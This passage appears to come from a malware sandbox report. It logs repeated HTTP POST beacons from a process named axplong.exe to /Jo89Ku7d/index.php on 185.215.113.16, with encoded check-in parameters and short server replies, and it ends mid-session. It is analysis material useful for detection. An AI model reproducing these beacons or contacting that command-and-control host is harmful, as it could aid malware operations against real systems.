                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:36.982070923 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:37.214258909 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  30 | 192.168.2.4 | 49767 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:37.336056948 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:38.026654005 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:38.027689934 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:38.250739098 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  31 | 192.168.2.4 | 49768 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:38.369590044 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:39.070564985 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:39.071377993 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:39.301939011 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  32 | 192.168.2.4 | 49769 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:39.413403034 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:40.141980886 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:40.142904043 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:40.376144886 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  33 | 192.168.2.4 | 49770 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:40.492649078 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:41.203954935 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:41.205070019 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:41.438050985 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  34 | 192.168.2.4 | 49771 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:41.555546045 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:42.246085882 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:42.247098923 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:42.470417976 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  35 | 192.168.2.4 | 49772 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:42.585969925 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:43.360661030 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:43.361581087 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:43.594156981 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  36 | 192.168.2.4 | 49773 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:43.710047960 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:44.408443928 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:44.409878969 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:44.634176016 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  37 | 192.168.2.4 | 49774 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:44.741858959 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:45.437916040 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:45.438915968 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:45.663281918 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  38 | 192.168.2.4 | 49775 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:45.776149988 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:46.512237072 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:46.512996912 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:46.749811888 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  39 | 192.168.2.4 | 49776 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:46.867578030 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:47.562932014 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:47.564677954 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:47.787681103 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  40 | 192.168.2.4 | 49777 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:47.897897005 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:48.605828047 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:48.606791973 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:48.841041088 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  41 | 192.168.2.4 | 49778 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:48.960648060 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:49.663690090 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:49.664798975 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:49.893507957 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  42 | 192.168.2.4 | 49779 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:50.007236958 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:50.721996069 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:50.722929001 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:50.950113058 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  43 | 192.168.2.4 | 49780 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:51.073642969 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:51.783442974 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:51.789798975 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:52.022228003 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  44 | 192.168.2.4 | 49781 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:52.362632036 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
